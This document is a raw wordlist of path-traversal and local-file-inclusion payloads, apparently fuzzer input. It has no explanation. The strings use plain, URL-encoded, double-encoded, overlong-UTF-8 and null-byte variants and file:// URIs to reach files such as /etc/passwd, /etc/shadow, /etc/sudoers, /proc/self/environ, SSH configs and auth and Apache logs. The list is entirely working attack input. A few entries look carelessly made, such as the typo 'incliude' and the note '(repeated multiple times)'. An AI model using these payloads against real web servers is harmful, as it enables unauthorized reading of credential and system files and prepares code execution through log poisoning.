index
html
home
page
incliude
web
index.php%00
html.php%00
home.php%00
page.php%00
incliude.php%00
web.php&00
/etc/passwd
/var/log/auth
../etc/passwd
/home/user/etc/passwd
/root/etc/passwd
/var/www/html/etc/passwd
/usr/local/etc/passwd
/opt/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/resolv.conf
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/etc/nginx/nginx.conf
/etc/apache2/apache2.conf
/etc/php.ini
/etc/mysql/my.cnf
/etc/redis.conf
/etc/crontab
/etc/passwd.bak
/etc/shadow.bak
/etc/group.bak
/etc/hosts.bak
/etc/resolv.conf.bak
/etc/ssh/ssh_config.bak
/etc/ssh/sshd_config.bak
/etc/nginx/nginx.conf.bak
/etc/apache2/apache2.conf.bak
/etc/php.ini.bak
/etc/mysql/my.cnf.bak
/etc/redis.conf.bak
/etc/crontab.bak

../../../../../../etc/passwd
../../../../../../../../../var/log/auth
../../../../../../../../../var/log/auth.log
....//....//....//....//var//log//auth
....//....//....//....//var//log//auth.log
....//....//....//....//....//etc//passwd
file:///../../../../../../etc/passwd
file:////../../../../../../etc/passwd
file:////../../../../../../../var/log/auth
file:///auth.log
file:///auth
file:///index
file:///index.php
file:///etc/passwd
file:///etc/hosts
../../../../../../../proc/self/environ
..//..//..//..//..//..//..//proc//self//environ
file:///proc/self/environ
../../../../../../../var/log/apache2/access.log
..//..//..//..//..//..//..//var//log//apache2//access.log
file:////var/log/apache2/access.log
file:///proc/self/environ
../../../../../../../proc/self/environ
..//..//..//..//..//..//..//proc//self//environ
file:///proc/self/environ
../etc/passwd
../../../../../../etc/passwd
../../../../../var/log/auth
../../../../../var/log/auth.log
....//....//etc//passwd
....//....//....//var//log//auth
....//....//....//var//log//auth.log
....//....//....//etc//passwd
file:///etc/passwd
file:///var/log/auth
file:///var/log/auth.log
file:///index.php
file:////var/log/apache2/access.log
..//..//..//..//..//..//..//proc//self//environ
file:///proc/self/environ
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
%252e%252e%252fetc%252fpasswd
%2e%2e/%2e%2e/%2e%2e/etc/shadow
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd
%c0%ae%c0%ae%c0%afetc%c0%afshadow
%252e%252e%252fetc%252fshadow
%252e%252e%252f%252e%252e%252fetc%252fpasswd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
../../../../../../../../../etc/passwd%00
../../../../../../../../../etc/hosts
%00../../../etc/passwd
%00../../../var/log/auth
../../../../../../../../../proc/self/environ
..//..//..//..//..//proc//self//environ
%00/etc/passwd
%00/var/log/auth.log
index.php%00
html.php%00
home.php%00
web.php%00
include.php%00
index%00
%252e%252e%252f%252e%252e%252f%252e%252e%252fvar%252fpasswd
file://etc/passwd%00
file://../../../../etc/passwd
%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cpasswd
%5c%5c%2e%2e%5c%5c%2e%2e%5c%5c%2e%2e%5cpasswd
%2e%2e%5c%2e%2e%5c%2e%2e%5cvar%5clog%5cauth.log
../%00../etc/passwd
%00..%00..%00..%00etc%00passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252fpasswd
../../../../../../../var/log/auth
../../../../../../../../../var/log/auth.log
%252fetc%252fpasswd
%00../../../../../../etc/shadow
%00/var/log/auth
%00../../etc/passwd
file://localhost/etc/passwd
%00file:///etc/passwd
....//....//....//proc//self//environ
....//....//....//var//log//auth
%252e%252e%252fetc%252fpasswd
..//..//..//..//proc//self//environ
file:///../../../../../../../proc/self/environ
%00file:///var/log/auth.log
../../../../../../../../etc/passwd
../../../../../../../../var/log/auth
file:///var/log/auth.log
file:////proc/self/environ
%252e%252e%252f%252e%252e%252fpasswd
%252fvar%252flog%252fauth.log
%252fvar%252flog%252fapache2%252faccess.log
file://../../../../../../../var/log/apache2/access.log
%252fproc%252fself%252fenviron
%2e%2e%2f%2e%2e%2f%2e%2e%2fproc%2fself%2fenviron
%252e%252e%252f%252e%252e%252fvar%252fpasswd
%c0%ae%c0%ae%c0%afvar%c0%aflog%c0%afauth
%c0%ae%c0%ae%c0%afproc%c0%afself%c0%afenviron
%00../../../../../../proc/self/environ
%00../../../../../proc/self/environ
%00../../../../../../../../../var/log/apache2/access.log
%00../../../var/log/apache2/access.log
%00../../../../etc/shadow
file:////../../../../../../../../etc/passwd
%c0%ae%c0%ae%c0%afetc%c0%afpasswd
%252fproc%252fself%252fenviron
%252fvar%252flog%252fauth.log
%252e%252e%252f%252e%252e%252fproc%252fself%252fenviron
%252fetc%252fshadow
%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
....//....//proc//self//environ
file:///etc/hosts
....//....//etc//shadow
file:////../../../../../../../../../etc/shadow
%2e%2e/%2e%2e/%2e%2e/etc/hosts
%00../../../../etc/hosts
file:////etc/shadow
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fshadow
%c0%ae%c0%ae%c0%afproc%c0%afself%c0%afenviron
%00../../../proc/self/environ
file:////var/log/apache2/access.log
file:////proc/self/environ
%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
..%c0%afetc%c0%afpasswd
/%00../etc/passwd
%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc%5cpasswd
%00../../../../../../../../../etc/shadow
..%252f..%252f..%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afshadow
%252e%252e%252f%252e%252e%252fpasswd
file:////../../../../../proc/self/environ
%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd
%00../../../../../../../etc/shadow
%c0%ae%c0%ae%c0%afvar%c0%aflog%c0%afapache2
../../../../../../../../../../etc/hosts
%2e%2e%252f%2e%2e%252f%2e%2e%252fproc%252fself%252fenviron
file://..%252fetc%252fpasswd
../../../../../proc/self/environ
file:////var/log/auth
../../../../../../../../../etc/shadow%00
../../../../../../../../../../var/log/auth
../../../../../var/log/auth.log%00
../../../../../var/log/apache2/error.log
file://///proc/self/environ
file://../../../../../../../../../etc/hosts
../../../../../../../var/log/syslog
file://../../../../../proc/self/environ
file:///proc/sys/kernel/random/uuid
../../../../../../../var/run/utmp
../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../var/spool/mail/root%00
../../../../../../../etc/passwd%00
../../../../../var/log/messages%00
../../../../../../../proc/kmsg
../../../../../../../var/log/dmesg
file://../../../../../../../var/log/lastlog
../../../../../var/log/wtmp%00
../../../../../../../../../var/lib/dpkg/status
../../../../../../../../../../etc/crontab%00
../../../../../../../../../usr/share/doc/apache2/changelog.Debian.gz
../../../../../var/log/tallylog%00
file:///var/spool/cron/crontabs/root
../../../../../proc/self/mountinfo
../../../../../../../../../../../../etc/sudoers%00
../../../../../../../../../etc/network/interfaces
../../../../../../../../../../../../etc/fstab%00
file://../../../../../etc/default/grub
../../../../../../../../../proc/cpuinfo
../../../../../../../../../../../../proc/cmdline%00
file:///proc/mounts%00
/index.php
/html.php
/home.php
/page.php
/include.php
/web.php
/etc/passwd
/var/log/auth
/var/log/auth.log
../etc/passwd
../../../../../../etc/passwd
../../../../../../../../../var/log/auth
../../../../../../../../../var/log/auth.log
../../../../../../../../../var/log/apache2/access.log
../etc/hosts
../../../../../../../proc/self/environ
./etc/passwd
./var/log/auth
./var/log/auth.log
./etc/hosts
./proc/self/environ
./var/log/apache2/access.log
.././etc/passwd
.././var/log/auth
.././var/log/auth.log
.././etc/hosts
.././proc/self/environ
.././var/log/apache2/access.log
../../../../../../etc/passwd
../../../../../../../../../var/log/auth
../../../../../../../../../var/log/auth.log
../../../../../../../../../var/log/apache2/access.log
../../../../../../../../../etc/hosts
../../../../../../../../../proc/self/environ
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fauth  

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fauth.log
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fapache2%2faccess.log
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fhosts
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc%2fself%2fenviron
file:///etc/passwd
file:///var/log/auth
file:///var/log/auth.log
file:///etc/hosts
file:///proc/self/environ
file:///var/log/apache2/access.log
../../../../../../etc/passwd (repeated multiple times)
../../../../../../../../../var/log/auth (repeated multiple times)
../../../../../../../../../var/log/auth.log (repeated multiple times)
../../../../../../../../../var/log/apache2/access.log (repeated multiple times)
../../../../../../../../../etc/hosts (repeated multiple times)
../../../../../../../../../proc/self/environ (repeated multiple times)
.././etc/passwd
../../../../../../etc/passwd/../../../../../../etc/passwd
../../../../../../../../../var/log/auth/../../../../../../../../../var/log/auth
../../../../../../../../../var/log/auth.log/../../../../../../../../../var/log/auth.log
../../../../../../../../../var/log/apache2/access.log/../../../../../../../../../var/log/apache2/access.log
../../../../../../../../../etc/hosts/../../../../../../../../../etc/hosts
../../../../../../../../../proc/self/environ/../../../../../../../../../proc/self/environ
